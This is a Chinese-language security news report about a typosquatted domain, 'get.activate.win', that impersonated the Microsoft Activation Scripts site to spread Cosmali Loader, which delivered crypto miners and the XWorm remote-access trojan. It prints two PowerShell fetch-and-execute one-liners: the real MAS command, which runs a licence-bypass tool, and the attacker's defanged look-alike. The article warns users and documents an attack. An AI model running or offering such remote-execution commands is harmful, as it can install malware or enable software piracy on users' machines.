圈小蛙
有人利用拼写错误抢注的域名冒充微软激活脚本 (MAS) 工具,散布恶意 PowerShell 脚本,这些脚本会用“Cosmali Loader”感染 Windows 系统。
MAS官方命令:
irm https://get.activated.win | iex黑客伪造命令:
irm hxxps://get.activate.win | iex最近有多名 MAS 用户开始在 Reddit [ 1 , 2 ] 上报告称,他们的系统收到了有关 Cosmali Loader 感染的弹出警告。
由于您在 PowerShell 中激活 Windows 时将“get.activated.win”误输入为“get.activate[.]win”,因此您感染了名为“cosmali loader”的恶意软件。
该恶意软件的控制面板不安全,任何查看它的人都可以访问您的计算机。
重装系统,下次别再犯同样的错误了。
要证明您的计算机已感染病毒,请检查任务管理器并查找异常的 PowerShell 进程。
根据报告,攻击者建立了一个看起来很像的域名“get.activate[.]win”,它与 官方 MAS 激活说明中列出的合法域名“get.activated.win”非常相似。
鉴于两者之间仅相差一个字符(“d”),攻击者赌用户会输错域名。
安全研究员 RussianPanda 发现这些通知与开源 Cosmali Loader 恶意软件有关,并且可能 与 GDATA 恶意软件分析师 Karsten Hahn发现的类似弹出通知有关。Cosmali Loader 提供了加密货币挖矿工具和 XWorm 远程访问木马 (RAT)。
虽然尚不清楚是谁向用户推送了警告信息,但很可能是一位好心的研究人员获得了恶意软件控制面板的访问权限,并利用该面板告知用户系统已被入侵。
MAS 是一个开源的 PowerShell 脚本集合,它使用 HWID 激活、KMS 模拟和各种绕过方法(Ohook、TSforge)自动激活 Microsoft Windows 和 Microsoft Office。
该项目托管在 GitHub 上,并由开源团队维护。然而,微软认为它是一款盗版工具,它使用未经授权的方法绕过其许可系统,在未购买许可证的情况下激活产品。
该项目的维护者也向用户发出警告,敦促他们在执行命令前检查自己输入的命令。
建议用户在不完全了解远程代码的功能时,避免执行远程代码;始终在沙箱中进行测试;避免重复输入命令,以最大程度地降低从拼写错误域名获取危险有效载荷的风险。
非官方的 Windows 激活工具屡次被用于传播恶意软件,因此用户在使用此类工具时需要意识到风险并谨慎行事。